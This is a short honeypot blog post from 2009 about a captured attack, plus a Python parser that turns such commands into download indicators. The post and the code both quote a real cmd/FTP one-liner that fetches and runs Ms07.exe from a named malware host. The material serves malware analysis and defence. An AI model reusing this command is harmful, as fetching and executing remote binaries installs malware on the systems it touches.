Iteolih: If you can't touch it ...

21 Jul 2009 Markus Koetter ftp iteolih

While playing with the current hsoc code, I got attacked, and saw an offer to download something from somewhere.
cmd /c echo open v1.usbupdatestrings.at 4356 > i&echo user ik ik >> i &echo binary >> i &echo get Ms07.exe >> i &echo quit >> i &ftp -n -s:i &Ms07.exe
The offer to download something was not that unexpected; we are working hard to get these offers so we can grab copies of something, but the location was interesting. Obviously they decided to go for a central service to deploy their malware, and to indicate that level of professionalism at first sight, they use(d) a domain.
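As an added example (not code from the original post or from the honeypot project it mentions), this Python function shows how a honeypot or log pipeline could turn a command line like the one above into structured download indicators for triage and blocking. The function name and the returned field names are assumptions; the sample input is the command quoted in the post.

```python
import re

# The command line captured in the post, verbatim.
CAPTURED = ("cmd /c echo open v1.usbupdatestrings.at 4356 > i&echo user ik ik >> i "
            "&echo binary >> i &echo get Ms07.exe >> i &echo quit >> i "
            "&ftp -n -s:i &Ms07.exe")

ECHO_RE = re.compile(r"^echo\s+(.*?)\s*(>>?)\s*(\S+)$", re.I)
FTP_RE = re.compile(r"^ftp\b.*?-s:(\S+)", re.I)


def parse_ftp_offer(cmdline):
    """Rebuild the FTP script written by the echo chain and extract indicators."""
    body = re.sub(r"^\s*cmd(\.exe)?\s+/c\s+", "", cmdline, flags=re.I)
    files = {}      # script name -> lines written by echo redirection
    offer = None    # stays None when no 'ftp -s:<script>' call is present
    for part in (p.strip() for p in body.split("&")):
        if not part:
            continue
        m = ECHO_RE.match(part)
        if m:
            text, op, name = m.groups()
            if op == ">":
                files[name] = []          # '>' truncates, '>>' appends
            files.setdefault(name, []).append(text)
            continue
        m = FTP_RE.match(part)
        if m:
            offer = {"host": None, "port": 21, "user": None, "password": None,
                     "files": [], "executed": []}
            for line in files.get(m.group(1), []):
                tok = line.split()
                verb = tok[0].lower() if tok else ""
                if verb == "open" and len(tok) >= 2:
                    offer["host"] = tok[1]
                    if len(tok) >= 3 and tok[2].isdigit():
                        offer["port"] = int(tok[2])
                elif verb == "user" and len(tok) >= 2:
                    offer["user"] = tok[1]
                    offer["password"] = tok[2] if len(tok) >= 3 else None
                elif verb in ("get", "recv") and len(tok) >= 2:
                    offer["files"].append(tok[1])
            continue
        if offer is not None:             # anything run after the ftp call
            offer["executed"].append(part.split()[0])
    return offer
```

The non-default port and the file that is both fetched and executed are the fields most useful for correlating repeated offers from the same distribution host.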